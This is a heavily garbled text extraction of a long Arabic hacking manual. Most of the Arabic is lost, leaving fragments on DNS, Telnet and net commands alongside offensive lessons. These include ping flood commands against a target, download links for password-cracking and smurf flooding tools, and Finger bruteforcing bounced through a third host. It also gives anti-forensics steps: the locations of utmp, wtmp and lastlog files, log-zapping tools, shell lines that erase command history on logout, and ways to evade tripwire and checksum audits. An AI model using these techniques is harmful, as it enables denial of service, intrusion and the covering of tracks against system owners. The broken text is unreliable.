You are on page 1of 928

.

.1
.
.2
.
.3
.
.4
)
.5
(.
)
.6
(.
.
.7
.
.8

.9
.
.10 .
.11 Webcrack.
.12 MungaBunga.
.13 .WinSmurf
.14 Evil Ping .
.15 .
.16 .
.17.
.18 .DNS
1

.19 Routing in the


.Internet
.NETBIOS .1
.2 .Finger
Net .3 .
.4 secure shell.
.5 Buffer Overflows.
.6 CGI .
.7 !.
.8 )
(.
.9 )
(.
.10 HTTP Port
!.!.
.11 NeoTrace.
.20
.
.21 .
.22 ) (.
.23 )
(.
2

.24
.
.25 .IIS
.26 UniCode.
.27
.
.28 .
.29 .
.30 God Will
.
.31.
.NOOP4
.32
.
.33 .
.34 .
.35
.
.36
.
>) .37&<( .
.38 CgiScaner .
3

.39
.
.40 Shadow Scan Security
.
.41
.
.42 ) (.
.43 ) (.
.44 ) (.
.45 )(.
.46 .htaccess
.47 FTP.
.48 FTP.
.49 .SQL
.50 SQL.
.51 .
.52 .
.53
.
.54
.
.55 ) PHP Shell (.
4

.56 ) PHP Shell (.


.57 ) PHP Shell (.
.58 .anmap
.59 .
.Cross Site Scripting .60
.61 .
.62 .
.63.
.64 .
.65 .
.66
.
.67 .
.68 .Chunked
.69 .
.70
.vBulletin2,2,0
.71
.
.72 .vBulletin 2,2,9
.73 .phpbb 2.0.0
.74 . php nuke
5

.75
.76
.77

.
.
.






...



.

"




"

8

" "



.


)) ((

..............................................................
.....



10




...

..........................




.. ..

!!!
((
..



..
11

..
. .

" "

> . <
> : <



.



12






. .




.

13








ISDN 256



.



. - - (:
14

: .


)) )) -





)) ))
.....


.


15

- - -


))
))





))
((




16



Cross Site Scripte
CSS XSS


XSS


XSS


) ( +

:
XSS+BUG+EXPLOIT
: IIS
IIS+exploit+bug


17



:

:


: http://www.google.com/
:
http://www.yahoo.com/ http://www.altavista.com/ http://www.lycos.com/http://hotbot.lycos.com/
18

)) :
.))
kazaa - WinMX
:
http://news.bbc.co.uk/hi/arabic/new
s - http://arabic.cnn.com/ http://www.aljazeera.net/
:
http://www.securiteam.com/ http://www.securityfocus.com/ http://www.ussrback.com/ http://www.ntbugtraq.com/ http://www.ntsecurity.nu/ http://www.ntsecurity.com/
: http://nvidia.com/ http://www.asus.com/ http://drivers.on-line.net.nz/ http://intel.com/ 19

http://www.amdmb.com/

"
"))
20

> <
> :. <

.
.

. ""
.





.




.
..
.
21

:



.
IP

.

.




.IP


.


22

.

.
Start run
.winipcfg .
"" ""
.winipcfg
. IP
IP
212.33.40.1 24.5.66.3
. IP
212
. IP
" "
. IP
IP
.
IANA(Internet Assigned
(Numbers Authority . IP
.

23

:
-1 ARIN (American Registry for
(Internet Numbers

-2 RIPE (Rseaux IP
(Europens

-3 APNIC (Asia Pasific Network
(Information Center
. . IP
.
IP
whois . IP

IP IP

http://www.ripe.net/db/whois.html
IP
.
24

IP
IP .
10.10.10.1 .
0 ) 255
(
.
IP
. IP
.
. IP
212.26.75.34 IP
212.26.75.201
.
IP )
IP (

IP. whois .

http://www.ripe.net/db/whois.html
212.26.75
25

search
.

Port


.
.
.
web server. ftp server
.
26


80
21
1720
.

. .
.
DNS

.

.
.
.
.DNS .
IP ..
CNN
207.145.53.10 www.cnn.com

..
27

. DNS
.
. IP .
DNS
) IP (
www.cnn.com
. .
DNS .
.
... .
DNS
. IP
.
netstat


IP
.


. .
28

. .
.connection
.
Client
.server
.
) .
( )
(port )
(
netstat . ms-dos
prompt programs

.
)IRC) Internet Relay Chat
.
chat server chat
client
.
. .

29


.
.
.
IP
. .
IRC.
chat server

.
.
.

.
IP
)
111.222.
XXX.333
(

30

IP
. .
.
. IP
, :
.1
)

( IP
.
.2 .
: .
.
IP
.

)
( IP
.

31


.


)
(

www.networksolutions.com/cgi /bin/whois/whois.
) www ( wagait.com
.

.
. .
.

32

FTP 21
25

31337

BackOrifice

1720,1503

Netmeeting

33


SMTP
80

Web

110

POP3

6667

Chat

12345,2003
4

NetBus

139

34

35

"
) ("



.


.



.



)( .


.
36


.
-1 ):(Viruses



. .
)
(
.
-2 ):(Trojans

. .
.
) ( . .

.

. .

37

" " NetBus"


" Back Orifice " "
. SubSeven
.
.
. .
. .
.
). (client
. .

.
)
( .
) (CD-ROM
.
.

38


.
-3 :
. .

.

.


. "

"
39

)
(

.
.
. ""
) (
.

.

!! .
!!
!!

40

.

-4 :
. .

)
( encrypted
. )
( PWL

41

.
. . 98
. 95
.
. .
-5
!

.


! ICQ

.

.

.
.

IP . .
42


. .
!
-6 -6 :


.

.



. .
) (script.

. .
!
4
.
.
43

-7 :
.
.
.
. . FTP.
) (SMTP .

.

.
. . .

.



.




44


.
. .
.
.

45

" "
> <
><JawaDal :
><z3r0 :


here we G0
..
dos .shell account
.. it reboots . ! .
!!!
. FTP:
/ftp://hostname
GFI LANguard network
security scanner
..21
..
.. !!
46

log in ftp :
...cd lcd dir ls
log in
LOGS...(LOG.FILES) 1

LOG
log files
) (loged in
:


online
IP Address >>>>>>>
) host name (

.
screen resolution

)>>>>(ISP
47

3 log files:
- WTMP \
\ host tty
- UTMP Onlne
- LASLOG \
!!
) (log.files )track you
... (down
: . !
.
<--. <----FTP--
!
.
!
.. . .

<--. <--.
<--...--so on--
!!
48

..
. -: Wingate ..
Wingate
.. Wingate
IP !!
1..

!
....
!! ..
anonymous ..web
!!...... .spyware.
firewall . zone alarm
)
.. (
. !!
windows washer
,. ..
.
. how to Stay
49

anonymous on the web how to


secure to secure my computer
..
..
Preety Good Privacy
(PGP)d ..
!
:
/http://www.pgpi.org
ok
!

..
..

-1 . wingate

.!
tracks
50

: log modifier
ah-1_0b.tar clear.c cloak2.c
invisible.c marryv11.c wzap.c
wtmped.c zap.c
=============================
=====================
=============================
=============
.
anonymous
.
. ..
!!!.

.

51

" "
> <
>:<

.
.
.
------------------------------------------------------ -1
.
-2 .
-3 .
-4 .ACL
-5 .

52

:
-1.
-3.
-3 .
-4.

.


.

:
-1
.
53

-2
.
-3
.
-4
National
.(Security Agency (NSA
-5

.
ROM Boot Chip
. RAM
.
-6.
.
-7 Permissions
54



.
-8 Rights

..
:
-1 .
-2 .
.

.

. . . .

55

.
.
. .
. .
.
.
..
56


Security
(Accounts Manager (SAM
Workstation

Domain
SAM

.
. .
. .
Access Token . .

:
-1 (Security Identifier (SID
.
-2 Group SIDs
..
57

-3 Privileges
.
Access Token

Remote
.Logon


.
. .

:
-1 .

-2 .
-3
58

.
-4 . .No Access
.
.

(Access Control List (ACL
ACL Access
.(Control Entry (ACE
ACE .
SID.


ACE
ACL ACE
SID
.
: ACE
59

-1 .AccessAllowed
-2 AccessDenied
.No Access

.
SID SIDs ACE
ACL.
NT 2000 ACE
AccessDenied ACEs
AccessAllowed ACEs SID
AccessDenied ACEs

AccessAllowed ACEs
SID
.
:
60


:

.
.
:
-1 .
-2 .

61

"
"
><
><BeReal :
.

62






. .
=============================
=============================
===========
) -:(Telnet
.
.

.
.
.

63

)(21

Anonymous Mode
.
. Start ==> Run
==> telnet .
-----------------------------------------------------------------------

-:Scanner



)(Exploits


. .

64

Shadow Security
Scanner Stealth Omran Fast
Scanner .
.
.

IIS
CGI .
----------------------------------------------------------------------

) -:(Exploits
.
URL.
.
.
.

65


. Buffer Over Flow Exploits
CGI
Exploits CGI Bugs
Unicodes Exploits Buffer
Over Flow Exploits
PHP Exploits DOS
Exploits .
.

. Fire Wall

). (c.


.

66



.
.
. )
(
Borland C++ Compiler
. .
---------------------------------------------------------------------

-:FireWall

. .


) (
. .
67

---------------------------------------------------------------------

-:Token )
(Shadowed Passwd

* x . Shadowed


. Shadow file
. etc/shadow/
---------------------------------------------------------------------

-:Anonymouse

.

68


.
---------------------------------------------------------------------

-:Valnerableties




.
Valnerable (:

.



Security Focus .
69

---------------------------------------------------------------------

: passwd file

.
.
-------------------------------------------------------------------- : root .
.

.


.
.

70

-------------------------------------------------------------------- :Server



24

24 . (:


.






71

- .
. -
--------------------------------------------------------------------- ) : ( Buffer over Flow

.
.


-
-

.
- DOS -
.
.

72

" "
:::
.

.
.


.

.

.

73

74

" " Webcrack


> <
> :<


....


...

75

76

77

78


http://www.dunbell.freeserve.
co.uk/webcrack40.zip
79

" " MungaBunga


><
>< KING HAKER :
. :
. MUNGA BUNGA


:
-1
-2
-3
-4
-5
) (
-6


80

1
2 BROWSE
.
3 BROWSE
81

)
.....(
4
5 )
(
6

7
8

9

. 10


82

11
6
. 12

13
) (
14



:
http://koti.mbnet.fi/hypnosis/c
aliberx/cracking.htm

83

" " WinSmurf


> <
> :<

..
winsmurf

Scree Shot
84

-------------------------------------------------------------

------------------------------------------------------------*** . winsmurf ***


txt
.
Kb 10
winsmurf
...
..
85

http://www.planeteagle.de/files/WSmurf.zip

" Evil Ping


"
> <

86

200

.

.

87

" "
> <
, ,
:

.
.

.
.

88

. :


. .
.

.

:

89


, :

90

:
:
..
http://www.geocities.com/boo
m_q8y4/dorrah.zip

91

" "
> : <

.


...
::
"" ===<==
:
92

Ping www.xx.com
:Xxx
.
:
) ( ) ( ) I-(
ping -n
:
ping -n 1000 -l 400 www.xxx.com
::

...
:
ping -t ip
ip .

93

" "
> <



.
2000





63
94

Telnet Authentication
You can use your local Windows
2000 user name and password or
domain account information to
access the Telnet server. The
security scheme is integrated into
Windows 2000 security. If you do
not use the NT LAN Manager
(NTLM) authentication option, the
user name and password are sent
to the Telnet server as plain text.s
2000 security context for
authentication and the user is not
prompted for a user
If you are using NTLM
authentication, the client uses the
Windowname and password. The
user name and password are
.encrypted

NTLM .
95

If the User Must Change Password


At Next Logon option is set for a
user, the user cannot log on to the
Telnet service when NTLM
authentication is used. The user
must log on to the server directly
and change the password, and then
.log on through the Telnet client


NTLM .


In a Windows 2000 Server default
installation, the Telnet service is set
96

to manual startup. You can use the


Services snap-in or the Computer
Management snap-in to start, stop,
or configure the Telnet service for
.automatic startup
2000
.
Services


In the Computer Management snapin, Telnet is a service located under
the Services and Applications node.
Select Services from the console
tree, and then select Telnet from the
.list of services in the details pane

You can also start or stop the Telnet
service from a command prompt. To
97

start Telnet Server, type net start


tlntsvr or net start telnet at the
command prompt, and then press
Enter. To stop Telnet Server, type
net stop tlntsvr or net stop telnet at
the command prompt, and then
.press Enter
Telnet Server Admin
You can use the Telnet Server
Admin utility to start, stop, or get
information about Telnet Server.
You can also use it to get a list of
current users, terminate a user's
session, or change Telnet Server
. .registry settings
Telnet Server Admin


98

, Telnet Server Admin


Telnet Administration Tool
Administrative Tools
,Start ,Run ,tlntadmn
.OK Telnet
, Server Admin
).(Adminpak.msi
Telnet Server
Administration

Quit this
application

List the current



users
.

Terminate a
user session

Telnet
Server Admin



99

Display/change

registry
settings

Start the
service

Stop the
service

Invalid
input

Failed to
open the

100

registry key

Failed to
query the
registry
value


You can use Microsoft Telnet Client
to connect to a remote computer
running the Telnet service or other
Telnet server software. Once you
have made this connection, you can
communicate with the Telnet server.
The type of session you conduct
depends on how the Telnet software
is configured. Communication,
games, system administration, and
local logon simulations are some
.typical uses of Telnet

101

The Telnet client uses the Telnet


protocol, part of the TCP/IP suite of
protocols, to connect to a remote
computer over a network. The
Telnet client software allows a
computer to connect to a remote
server. You can use the Telnet
client provided with Windows 2000
to connect to a remote computer,
log on to the remote computer, and
interact with it as if you were sitting
.in front of it
Users of previous versions of
Microsoft's Telnet client may notice
a few changes in the version
included with Windows 2000. The
most obvious change is that
Microsoft Telnet Client is now a
command-line application rather
than a Windows application. As a
command-line application,
102

Microsoft Telnet Client will seem


very familiar to users of UNIX-based
.Telnet clients
An important new feature found in
Microsoft Telnet Client is NTLM
authentication support. Using this
feature, a computer using Microsoft
Telnet Client can log on to a
Windows 2000 computer running
the Telnet service by using NTLM
.authentication


,Run ,Start ,Telnet
. telnet .telnet
.
TCP/IP

103

To display help for Telnet, type help


at the Microsoft Telnet command
prompt. To connect to a site, type
open <computer_name> where
<computer_name> is the IP address
or host name of the computer
.running the Telnet service



Hishem1
Hishem2
Hishem2
Hishem1 .
Hishem2
Hishem1 .
Hishem1
Administrator

104

,Programs , Start
.Services Administrative Tools
Services

.Telnet
The Telnet Properties
((Local Computer
Manual Startup Type
.Automatic
. Start ,Service status
Local) OK
Computer) Telnet properties
. Services

Hishem2 Hishem1

.Run , Start
105

telnet .OK

help ?

open Hishem2

. o open

Hishem2

Hishem2

106

Hishme2
Hishem1

, Start .Run
tlntadmn .OK
Telnet Server Admin
1
.
NOR IP

2 .
107

.

1 .
1

Hishem1


108

Start Run Telnet


pop.mail.yahoo.com 110



user
.
user
xxxx
pass
pass xxxx
Ok


List
.

109

dele

pop




[open [\\RemoteServer] [Port

\\ RemoteServer
.
.
Port
110

.
.

.o

Redmond
44:
o redmond 44

Telnet

[close [\\RemoteServer

\\ RemoteServer
.
.

111


.c

Redmond:
c redmond 44

Telnet

]send [\\RemoteServer] [ao] [ayt
[?] [[esc] [ip] [synch

\\ RemoteServer
.
.
ao
.
112

ayt
"."?Are you there
esc
.
ip
.
synch
.Telnet

Telnet

display

113

display
.Telnet ) Telnet
(Telnet

Telnet
.[+CTRL Telnet
.ENTER

tlntadmn
Telnet

]tlntadmn [\\RemoteServer] [start
[[stop] [pause] [continue

\\ RemoteServer
.
.
start

114

.Telnet
stop
.Telnet
pause
.Telnet
continue
.Telnet

Telnet

. tlntadmn
.
2000 .2000
. tlntadmn
Windows 2000 Telnet
.
Windows XP

Telnet

115


tlntadmn [\\RemoteServer] config
[[maxconn=PositiveInteger

\\ RemoteServer
.
.
maxconn=PositiveInteger
.
10
.


Telnet

tlntadmn [\\RemoteServer] config
[[maxfail=PositiveInteger
116


\\ RemoteServer
.
.
maxfail=PositiveInteger

. .
.100


Telnet

tlntadmn [\\RemoteServer] config
[[timeout=hh:mm:ss

\\ RemoteServer

117

.
.
timeout=hh:mm:ss
.
. ? /
..

" " DNS


118

> <
>< Dark Devil :
:


.....



C

:




:
:DNS

:

119

=============================
=====================
=========================
?DNS
==============
DNS : Domain Name
. System DNS
53
DNS
53
translates alphabetical hostnames
:
/http://www.burn.com IP
ADRESSES 127.0.0.1


address
resolution
IP
DNS
. address resolution
120

DNS


. ). (IP
address
resolution DNS
HOST FILE

IP
Stanford Research
Institute's Network Information
.(Center (SRI-NIC
) (UPDATE
.

FTP
.SRI-NIC

. .


DNS .
121

DNS decentralized

DNS DNS

DNS
.
DNS
.
.
:THE DNS SERVER
================
DNS SERVER
. UNIX
. BIND )
.(Berkeley Internet Name Domain

DNS SERVER
. UNIX
DNS :
the name server itself (the daemon
122

(program that listens to port 53


RESOLVER
NAME SERVER

/http://www.burn.com
DNS )
( IP
/http://www.burn.com
IP

.
daemon program


.
:THE TREE INFORMATION
======================

IP
123

DNS DNS
SERVER


.DNS SERVERS


:
ISP
isp.co.uk

ISP's DNS server's
hostname dns.isp.co.uk
DNS IP
/http://www.burn.com
. dns.isp.co.uk


DNS SERVER
.
dns.isp.co.uk some-
organization.org.uk
124

school.edu.uk, university.ac.uk,
england.gov.uk, airforce.mil.uk
UK

DNS
ROOT
IP
.DOMAIN NAME
When and why does DNS "hang" or
?fail
=============================
=========
DNS .
ISP IP

.
DNS
15 .

address could not be found
HOST IP
125


.
DNS . TIMED OUT

REFRESH RELOAD
.











.
SSL
. .
126

127

" Routing in the Internet


"
> <
>< Dark Devil :
. :


.Routing

:
:Routing in the Internet
=========================
!?what is routing
128

.

.

:
Physical Address Determination-1
Selection of inter-network-2
gateways
Symbolic and Numeric Addresses-3


ip .
ip


.

)
inclusion of a local network address
129

or physical address within the


.(frame


local networks
.gateways
, routers

.
ip routing
.

address translation


/http://www.burn.com ip

) DNS DNS
(.
130

Physical
Address :
:Physical Address Determination
=============================
==
ip data

.

physical address .
.
ip physical
, addresses
ip
.

.
ip physical
addresses ARP
Address Resolution Protocol

ip physical
131

, addresses
. ARP cache
. arp -a
. .

:
C:\WINDOWS>arp -a
Interface: 62.135.9.102 on Interface
0x2
Internet Address Physical Address
Type
20-53-52-43-00-00 207.46.226.17
dynamic
20-53-52-43-00-00 213.131.64.2
dynamic
20-53-52-43-00-00 213.131.65.238
dynamic


132

Physical Address

Physical Address Mac
Address

Physical Address
ip
Physical Address
router .
type dynamic

.
static
" "

routers

133

" " NETBIOS


> <



SNMP


134

NetBIOS
NetBIOS
API
139 TCP

.
NT
NetBIOS

TCP/IP Advanced
WINS


.
.
RestrictAnonymous

Administrative TOOLS
Local Security policy Local
poicies security options
135

Additional restrictions for


anonymous connections
security
No Access Without Explicit
Anonymous Permissions

NetBIOS

Net View


NT/W2000


IP

136


Net .

Nbtscan
. ...
...

Legion


TCP UDP
135 445+ 139

137


NetBIOS
.
SNMP 2000



Public

public
Remove Send
authentication trap

138



regedit
HKEY_LOCAL_MACHINE\system\curr
entControlset\serveces\SNMP\parameters
\ExtensionAgent
LANManagerMIB2Agent

.
139

= 2

TCP/IP

NetBIOS

" "Finger
> . <
><LAMeR :

140

.

Finger 79


>================<
1.1
1.2 Finger
1.3. Finger
1.4 . Finger
1.5. . Finger
1.6
1.7.

1.1:
>=========<

141


.
.
1.2 Finger
>===================<
Finger

79
businesscard
.
. ) ( remote user
Finger .
) Finger (79 .

.

..
,
.) (admin
. .
142

.
.
Finger
.
.. Finger.
.
Finger

) Finger Deamon
( " " !Finger me " ! "

Finger

)(bisinesscard

.
Finger Deamon
143



) ( . .
. .
.
portscans . . .
.

Finger

Finger

: Finger
.
.
. . .
:.) ( server
144

.
1.3. Finger
>=================<
. )
( superscan
)
( /http://www.foobar.com
) Port( 79
/http://www.foobar.com
Finger .
. ) (request .

)(client
Finger ) ( installed
. Telnet. Finger
--->Telnet(client) --------request-------
Finger Deamon(in Server) o
145

)MS
: ( DOS
telnet http://www.foobar.com/ 79
telnet
.

.
)(client Finger
Deamon
. .
:::
.


. . "@"
" "www
:
146

finger@anyname.com
:
/finger http://www.anyname.com
www finger

)
: ( unix shell .
finger@foobar.com
. )
(
/http://www.foobar.com
:
Login: Name: Tty: Idle: When:
:Where
root foobar sys console 17d Tue
10:13 node0ls3.foobar.com
<.......> <.......> <.......> Amos Amanda
147

Anderson Kenneth
Bright Adrian
Doe John
<.......> <.......> <.......> Johnson Peter
Mitnick Kevin
Munson Greg
Orwell Dennis


) ( login
)" (Name "

.
)(Tty the
terminal type
) (Idle .the idle time

.
..
.
148

.. .
.
) Johnson Peter
( :
finger johnson@foobar.com

1.4 . Finger
> =========================
===========<

.Finger
Finger deamon
..
) ( % 50

/
)(Access ..
149


bruteforce
worldist
password cracker



/http://www.thehackerschoice.com

VLAD's pwscan.pl

) word (


. - bruteforce

-
.
.
) (Admin )(root

150

.
.
.

:
finger secret@foobar.com
Finger Deamon

" "secret
.

" "test " "temp ""0000
" "secret

.
finger .@foobar.com
finger 0@foobar.com
151

!
Finger Deamon
RFC !

1.5. . Finger
> =========================
=============<
. ) Finger Finger
"" ""(
. "
"www.victim.com
""www.host.com
. Finger
. ):
(
finger@host.com@victim.com
Host.com ) (Finger
152

victim.com .

victim.com
. /http://www.victim.com
) (log
/http://www.host.com
.
) Host(
. ) ( Finger.


. . Finger


. . Finger
.
: .

.
!.
153

1.6
>=======================<
Finger Deamon

) ( access ..
Finger deamon

.access



wordlist .bruteforce
". "
.Finger deamon

154

"
" NET

> <
.
.net
net
155

:
net
? net /
.

net
net help command
.
net acc
ounts :
net help accounts
net
) /y( ) /n( .
net stop serv
er
net stop
server /y

.

.
).("Service Name "
156


:net logon
"net start "net logon
Net
Net accounts



.

net accounts
| [/forcelogoff:{minutes
]no}] [/minpwlen:length
| [/maxpwage:{days
]}unlimited
][/minpwage:days
][/uniquepw:number
][/domain

}/forcelogoff:{minutes | no


157

.
.
.
no
.
/minpwlen:length

..
0 127

.
| /maxpwage:{days
}unlimited
.

. .
unlimited
.
/maxp
wage /minpwag
.e 1
49,710 )
158

unlimited 49,710
( 90
.
/minpwage:days
.
.
.
0
.
0 49,710
.
/uniquepw:number
.

number
.
0 24


.
/domain

159

.
,
.
net help command
net
.

Net
Logon

. .
net
accounts

.

. :net accounts
o .
.
net user
.
o Net Logon
160



. Net
Logon
.
. /forcelogoff:
minutes


. .

.
minutes

.


:
net accounts

:
161

net accounts /minpwlen:7


.


:
net accounts /uniquepw:5

.
30



:
net accounts /minpwage:7
/maxpwage:30
/forcelogoff:5


:
net accounts /minpwage:7
/maxpwage:30 /domain
162

Net computer

.

net
\ computer
| \ComputerName {/add
}/del

\\ComputerName

.
}{/add | /del

.
net help command
net
.

Net computer

163

Grizzlybear
:
net computer \\grizzlybear
/add
Net config


.
net
config
.

|net config [{server
]}workstation

server

164


.
workstation


.
?/

.

. net config server



.
.

. net config
.server Net config
server
:
Server computer name
Server comment
) Server version
165

(
) Server is active on
(
) Server hidden /hi
(dden
Maximum logged on
) users
.
(
Maximum open files per
) session

(
) Idle session time(
. net config
workstation
.
Net config
workstation :
Computer name
Full computer name
User name
166

)Workstation active on
(
)Software version
(
Workstation domain
Workstation domain DNS
name
Logon domain
( )COM open timeout
( )COM send count
)COM send timeout
(
Net continue

.net pause

net continue service

service
.
167

.
.service

Net
netlogon
.Logon
NT
"nt lm
LM Security security
Support
support
.Provider "provider

schedule
..

server
.
workstatio
.
n
net help command
net
.


.
168

. net continue

..


.

.
) "
.("Service Name

:
net continue workstation


.
NT LM
Security Support Provider
Service:
net continue "nt lm
security support
169

"provider
Net file



.

. .
net file
.

]]net file [ID [/close

ID
.
/close

.

.
170

net help command


net
.

net files
.
. net file

. .

.


.. net file /close
.
net file :
File
Path
Username #locks
-----------------------------------------0
C:\A_FILE.TXT
MARYSL
0
171

C:\DATABASE
DEBBIET 2


:
net file
1
:
net file 1 /close
Net group

.

net group [groupname
[/comment:"text"]]
[/domain]
net group [groupname
{/add [/comment:"text"]
| /delete} [/domain]]

172

net group [groupname


| username[ ...] {/add
]]/delete} [/domain

groupname

.

.
"/comment:"text

.
48 .

.
/domain

.,

.
/add
173


. .

.
.
/delete

. .
]UserName[ ...


.

.
net help command
net
.


net group
.
. .net groups
174

net group


.

. .
net group

)*(.
net group
:
Group Accounts for
\\PRODUCTION
--------------------------------------------*Domain Admins
*Domain Users


:
net group
nor
175


:
net group NOR /add
nor
:
net group NOR /add
/domain

stevev ralphr jennyt
nor
:
net group NOR stevev
ralphr jennyt /add

stevev ralphr jennyt
nor
:
net group NOR stevev
ralphr jennyt /add /domain

nor:
net group NOR
176

Net help



.
. net
help

.

]net help [command

command
/help

.

.

net
177

use:
net help use
:
net use /help
net help
:
?net help /
Net helpmsg

.

net helpmsg message#

message#
.

.
net help command
net
.
178



:
2182: The requested service has already been
started.


. NET
2182:
net helpmsg 2182
Net localgroup

. .
net
localgroup
.

net localgroup
[GroupName
]]"[/comment:"text
179

180

" "secure shell


> <
><ACID BURN_EG :
. :
.

Secure Shell :: SSh
::
SSh
===============
secure shell )(

181

.
remotely connection
.
.

)rlogin,rsh
.(and rcp
. secure shell
tcp .

:: ::
. secure shell
r- commands

=============================
=====================
=============================
=========

182

======================
* BSD
r- commands )
(rlogin,rsh and rcp

) (root access





unauthorized
access to systems




:
.

(
183






ssh


. authorized access to systems







secure
shell

184

) . (
::
. ssh
=============================
==============
-1 ip spoofing


ssh
ssh
. localy
-2 DNS spoofing
-3

-4

185

ssh

ssh
disconnected
.

.
ssh )
three-key triple-DES, DES, RC4-128,
(TSS, Blowfish .
.
" encryption of type
"none !
ssh
,
ip spoofing DNS
spoofing

.
186

. .




.

" "Buffer Overflows


> . <
><LAMeR :
. Buffer
.. Overflows
187


:
-1 Buffer Overflow
<--------------------------
-2)(Proccess
<-----------------
-3 )(Memory management
<--------------------------------
-4 Buffer Overflow
<----------------------------------
*

.

188

-1 Buffer Overflow
<>-----------------------
Buffer Overflow
.
Buffer
Overflow ' 'code red
. IIS MS web-
- server
Buffer Overflow
)

20(
.
:
" :
" : .
) (
.

15
) .( 25
189

) .
(.
15
" "Overflow
.

:

>var1><var2><vname><Other
<things in memory
10b 6b 15b
) var 1 var 2
vname, 15
.(
. "
abcabcabcabcabcabcabcabca
"bc :
somevalue2avalusabcabcabc
abcabcabcabcabcabc
>var1 ><var2><vname ><other
<things go here
190

" vname
"overflowed
. "other things in
memory "
) (overflow ..



.
. linux
. .

-2):(Proccess
<>----------------


).(Proccess
.

191

.
" Multi-

"proccesses ...
) (CPU
.


.. (:

.
:

-3 ):(Memory management
<>------------------------------
-operating systems-
virtual
)memory(.
) (
.
192

Operating System
"
)(" .
. ) OS. (

.

. ) (
.
) ( .
.
)
(
.
.:



)
(
)
(
193


) (


)( .

-4 Buffer Overflow
<>---------------------------------


) (Root
.
)( .


) (overflow

.
: )(
. )
(

194

)(
. . ..


Buffer Overflows
Buffer Overflows
.

Buffer Overflow

.

195

" CGI "


><
> <King_abdo :
. CGI

) (1 CGI

196

CGI=COMMON GATEWAY
INTERFACE
.
)
(HTTP

TCP/IP
.

) 80
(

.

.

197

.
:

-1 .

-2
.

198

GET -1 .

POST -2

PUT -3

) (2

199



HTTP


.
.
. FTP .TELNET

"
!"
200

> <
> :<
:
==========

..

.
..
..


.. .

.. ..
..

log
.. files . !
!!
..
201

************************
)
( exploites
"
"
) ( 0day
..

!!

!!
. !!

..

hacker


..

************************
8 :
202

=================
: )
(
: **"
" Paranoid
:
" " Paraniod " " Paranoid !
** ..

.
:
. )
(
LoGs203

:
) (
lOGs ..
syslog configuration andlogfile
Admins checksum checkingsoftware
. :
: .
. .
:

: ........
204

!!! ...
************************
:
=======
:*************
..
..

) ( Hacker
..

) (

.
" " Paranoid***************************
" " Paranoia
)
(
205


..
:
paraniod

!!

.. ..
..
.


!!

.. .
.. ... .. ..
) (
. ..
!!
!
..
)
206

( .. ..

.. !!
..

log
hacker . .. 100
%
" " Paranoid*********************

" " Paranoid
...

) (
...

..
207

..
..
)
(
..

.

!



!
******************************************

..

:
!!!!
208


:=========
******

..

:***********
SysAdmin


.
..

209



(= hacker

.. ..


) (
>--
<-
sensitive data
.
..
:
MsDos SFS v.17SecureDrive 1.4b
. *Amiga EnigmaII * ) v1.5 .
(
Unix CFS v1.33210

) (
) ( :
Triple DES IDEA (Blowfish (32 rounds file2file :
PGP v2.6.x Unix
) System (
. :
SSH DES Login .. ..
.. ..

..
211

)
8- 4 ( 8

.
.. )
( ..

!!
CD
HD

..
document files



!!
:
=================
212

: , ,
.

:


!! keyborad

..
!!! !!
!!!

...
"
"
!!!

213

:
===================

\\\ :
. ..

telnet
security ..


!!!!
... ==<
>----
: LoGS
214

============
3 :
WTMP ) log( on/off - log in/logout + tty + host
UTMP ! LASTLOG - logins

** )
(
telnet , ftp ,
rlogin ..
:
!! . .. % 99.9 )
.. (
logfiles
..
215

. ..

.. .
.
:
.
.
ZAP (or ZAP2
.
.
. ..
root log
) files (
) default
(
UTMP : /etc or /var/adm or /usr/adm
or /usr/var/adm or /var/log
WTMP : /etc or /var/adm or /usr/adm
or /usr/var/adm or /var/log
LASTLOG : /usr/var/adm or
/usr/adm or /var/adm or /var/log
$home/.lastlog
216

:
=======

!!! ..

tmp and $HOME/
$HOME Shell History
:
: History files
sh : .sh_history
csh : .history
ksh : .sh_history
bash: .bash_history
zsh : .history
: Backup Files
~* ,dead.letter, *.bak
: History files
mv .logout save.1
echo rm -rf .history>.logout
echo rm -rf .logout>>.logout
echo mv save.1 .logout>>.logout
217

======================
. encrypted
partition .
) (

admin .
..


..
.. .
shells
background
!!!
. parametres
...
.
telnet http://www.host.com/ :
23
telnet
218

open
/http://www.host.com
..

backdoors .
) sub7 (

:

=============================
==
*******
sniffer ..
.
:
**********************
) (
hacker
...
219

!!!


...
* ) (
) ( admin .

) (
output sniffer
netstat
online
!! GateWay Server
* A gateway server in between

.

wtmp and lastlogs
. gateway
server
..
220

..
gateway server
..
==< ) root access
(
Dialup server
..

(= hacked system
:
dialup . hacking
server


) ( )
( dialup servers
!

:
221

lOGs ..
********************************************
******
***
.
..
:
- 1 :
. LSOF List Open
Files
- 2 )
( -
touch /tmp/check
222

""find / -newer /tmp/check -print


. : <-
<- <-
log files
/usr/adm /var/adm /var/log
loghost
xx@loghost ..
loghost
logfiles
. text editor
. wc 10
head" :
"-LineNumbersMinus10 )
10( head -
accouting
. acct-cleaner from
zhart .
. . wtmpx utmpx
!!!
..
) (
223

=(
syslog configuration andlogfile
************************************
syslog function
..
syslog
logs
hosts ...
hosts
syslog /etc/syslog.conf
******************************

.
cron
/var/spool/cron/crontabs
. . Root
.
.
224

"."crontab -l root

. ~/bin
. sinnefer
.

,tiger, cops, spi, tripwire, l5


.binaudit, hobgoblin, s3 etc

,
.
.
. , :
. ) (

back door
Admins****************************
,
225

.
:
forword. alias sulog su root
group ) admin,
root, wheel, etc
passwd
, .
) .
,. chid.c,
changeid.c .( .

history/.sh_history/.bash_history
,
,
. .
profile/.login/.bash_profile
alias . ,
226

. .
,

checksum checking software


************************
) checksum
.
(


.

.




.
checksum
227

SOFTWARE : STANDARD PATH :


BINARY FILENAMES
tripwire : /usr/adm/tcheck,
/usr/local/adm/tcheck : databases,
tripwire
binaudit : /usr/local/adm/audit :
auditscan
hobgoblin : ~user/bin : hobgoblin
raudit : ~user/bin : raudit.pl
l5 : compile directory : l5


NTFS
checksum
) CD ( ...
.
.


) (
..
228



- 1.

"tripwire -update
."/bin/target
- 2

)
checksum
(

. *******************
.
) ( ..
admins

startup
229

profile, .cshrc, .login, .logout.


) (

:
=========

***************************
) (
administrators .

) (
: administrators hacker ==<
...
) admins
hacker
administrator
administrator (
..
230


..

..
. .
..
) (
..
..

..

:
=========
. .
. :
********************************************
******
**************
: !!!! :
231

..

..
) (

.
..


: !!! :

..
..

) (

..

!


.
232





:
========
:
******************************
Change - Changes fields of the
logfile to anything you want
Delete - Deletes, cuts out the entries
you want
Edit - real Editor for the logfile
